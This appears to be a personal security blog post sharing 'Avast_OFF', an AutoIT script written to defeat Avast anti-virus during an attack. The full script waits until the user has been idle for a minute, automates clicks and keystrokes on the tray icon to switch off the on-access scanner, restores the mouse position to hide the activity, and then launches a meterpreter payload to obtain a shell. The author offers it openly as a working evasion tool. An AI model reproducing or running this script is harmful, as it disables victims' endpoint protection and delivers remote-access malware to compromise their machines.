After a four-part investigation (really an introduction, since I was working on tutorials) into bypassing anti-virus, an update to the target product slapped me in the face and halted the mechanisms I had used for circumvention. I needed a solution that would let me continue deploying meterpreter, and Avast_OFF is what I came up with.

I was looking for some way, any way, to bypass the product in question, just to see how easy it was with today's tools. I had seen AutoIT used in the past, and it offered everything I needed: an easy way to program GUI interaction without learning to program. Most applications are designed to interact with the end user, and anti-virus products are no different, so using AutoIT to mimic the user's actions should work. So long as the anti-virus product allows the script to execute and the user behaves as expected, the result is the same: my payload is delivered and I get the shell I'm really after.

[The script]
-----CUT-----
#Region ;**** Directives created by AutoIt3Wrapper_GUI ****
#AutoIt3Wrapper_icon=..\..\..\..\Program Files\AutoIt3\Icons\filetype-blank.ico
#AutoIt3Wrapper_UseUpx=n
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
#include "SysTray_UDF.au3"
#include <Timer.au3> ; standard AutoIt UDF that provides _Timer_GetIdleTime(); the include name was lost in extraction

$ApplicationX = "ashDisp.exe" ; process name of the tray icon we are looking for

Global $iIdleTime = _Timer_GetIdleTime()
; Wait for 60 seconds of inactivity before doing anything.
While $iIdleTime < 60000
    Sleep(1000)
    $iIdleTime = _Timer_GetIdleTime()
WEnd
MsgBox(0, "I Think were alone", "if you left me longer than 60 second your in for it [" & $iIdleTime & "]", 2, 0)

; Remember where the mouse was so it can be put back afterwards.
$MouseReturn = MouseGetPos()
$class = "classname=Shell_TrayWnd"
$hControl = ControlGetHandle($class, "", "Button1")

; Get the tray position and move there.
$posTray = WinGetPos(_FindTrayToolbarWindow())
MouseMove($posTray[0], $posTray[1])

; If the XP "Hide Inactive Icons" mode is active, expand the tray first.
If $hControl <> "" And ControlCommand($class, "", $hControl, "IsVisible", "") Then
    ControlClick($class, "", $hControl)
    Sleep(1000)
EndIf

$index = _SysTrayIconIndex($ApplicationX)
If $index <> -1 Then
    $pos = _SysTrayIconPos($index)
    If $pos = -1 Then
        MsgBox(0, "Not Found", $ApplicationX, 30, 0)
        Exit
    Else
        MouseMove($pos[0], $pos[1])
        MouseClick("left")
        Sleep(500)
        If Not WinActive("avast! On-Access Scanner", "") Then WinActivate("avast! On-Access Scanner", "")
        WinWaitActive("avast! On-Access Scanner", "")
        Send("{ALTDOWN}t{ALTUP}")
        Sleep(500)
        Send("y")
        Sleep(500)
        Send("{ALTDOWN}o{ALTUP}")
    EndIf
EndIf

; Put the mouse back where the user left it.
MouseMove($MouseReturn[0], $MouseReturn[1])
Sleep(3000)
MsgBox(0, "so far so good!", "with any luck AV is now off and the payload is about to be launched", 4, 0)
Run("meterpreter.exe", "", "")
-----CUT-----

There is nothing new in this information; it was just an exercise for myself, but this is my only blog, so I have posted the code here.
